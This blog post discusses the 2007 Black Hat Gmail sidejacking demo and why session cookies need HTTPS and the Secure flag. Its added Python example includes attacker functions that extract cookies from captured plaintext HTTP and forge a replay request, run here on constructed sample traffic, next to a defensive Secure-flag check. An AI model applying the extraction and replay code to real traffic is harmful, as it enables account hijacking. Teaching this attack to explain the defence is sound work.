So some of the jokers at Black Hat gave a very effective demo of why it is just plain stoopid to use public WiFi networks without turning the paranoia level up to max before you start. For their demo all they did was set up a willing victim and do some basic network sniffing to feed a parser that pulled cookies out of the captured HTTP traffic. That let them snarf the target's Google account session cookie and replay it in their own browser, walking straight into the victim's Gmail account without ever needing the password.
It surprises me (a lot) that this is being presented as something new, but hats off to Rob Graham and Errata Security, not only for getting a gig at Black Hat 2007 for something that isn't really a hack, let alone something new, but for getting the 'net media to distribute the news far and wide as an expose on how to "hack Web 2.0".
It's a welcome reminder though that you can't trust important data to any network you don't control. Encrypting just the credential exchange is not enough, either: Gmail already sent the login over HTTPS at the time, and the cookie got sniffed because the session that followed ran over plain HTTP. The whole authenticated session has to stay encrypted, and session cookies need the Secure flag so the browser never sends them in the clear in the first place.
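To make the attack and the fix concrete, here is an added example, not code from the original post and not Errata Security's tooling: a minimal parser that does what the demo's parser did (pull Cookie headers out of captured plaintext HTTP requests and build a replay request from them), alongside the check a defender wants (which Set-Cookie headers arrived without the Secure flag). The capture, host names and cookie values are all constructed sample data, not a real sniff.

```python
"""Added example, not from the original post or Errata Security: extract
session cookies from captured plaintext HTTP, build the replay request, and
flag cookies that were set without the Secure flag.  All traffic below is
constructed sample data."""

from typing import Dict, List, Tuple

# Constructed sample of what a sniffer hands to a parser on an open WiFi
# network: raw HTTP messages, requests and responses mixed.  Hosts and cookie
# values are made up.
CAPTURE = [
    b"GET /mail/ HTTP/1.1\r\nHost: mail.example.com\r\n"
    b"Cookie: SID=abc123; HSID=xyz789\r\n\r\n",
    b"HTTP/1.1 200 OK\r\n"
    b"Set-Cookie: SID=abc123; Domain=.example.com; Path=/\r\n"
    b"Set-Cookie: SSID=s3cr3t; Secure; HttpOnly\r\n\r\n<html>",
    b"GET /img/logo.png HTTP/1.1\r\nHost: static.example.com\r\n\r\n",
    b"POST /login HTTP/1.1\r\nHost: other.example.org\r\n"
    b"Cookie: PHPSESSID=deadbeef\r\n\r\nuser=x",
]


def split_headers(msg: bytes) -> Tuple[str, List[Tuple[str, str]]]:
    """Return (start line, [(lowercased name, value)]); the body is ignored."""
    head = msg.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers


def extract_cookies(capture) -> Dict[str, Dict[str, str]]:
    """Attacker side: Host -> {cookie name: value} for every request that
    carried a Cookie header in the clear."""
    jar: Dict[str, Dict[str, str]] = {}
    for msg in capture:
        start, headers = split_headers(msg)
        if start.startswith("HTTP/"):
            continue  # a response; nothing to steal from its Cookie side
        host = dict(headers).get("host")
        if not host:
            continue
        for name, value in headers:
            if name == "cookie":
                for part in value.split(";"):
                    k, _, v = part.strip().partition("=")
                    jar.setdefault(host, {})[k] = v
    return jar


def forge_request(host: str, path: str, jar: Dict[str, Dict[str, str]]) -> bytes:
    """Attacker side: the request that rides the victim's session.  No password
    is involved; the server only sees the cookie it issued."""
    cookie = "; ".join(f"{k}={v}" for k, v in jar[host].items())
    return f"GET {path} HTTP/1.1\r\nHost: {host}\r\nCookie: {cookie}\r\n\r\n".encode()


def insecure_set_cookies(capture) -> List[str]:
    """Defender side: names of cookies a server set without the Secure flag,
    i.e. cookies a browser will happily send over plain HTTP."""
    weak = []
    for msg in capture:
        start, headers = split_headers(msg)
        if not start.startswith("HTTP/"):
            continue  # only responses carry Set-Cookie
        for name, value in headers:
            if name != "set-cookie":
                continue
            cookie_name = value.split("=", 1)[0].strip()
            attrs = [a.strip().lower() for a in value.split(";")[1:]]
            if "secure" not in attrs:
                weak.append(cookie_name)
    return weak


if __name__ == "__main__":
    jar = extract_cookies(CAPTURE)
    print("stolen:", jar)
    print("replay:", forge_request("mail.example.com", "/mail/", jar))
    print("set without Secure:", insecure_set_cookies(CAPTURE))
```

Note that the sample response sets SID without Secure and SSID with it: SSID would never appear in a plaintext capture, while SID is exactly what the sniffer picks up on the next HTTP request. That is the whole point of the flag.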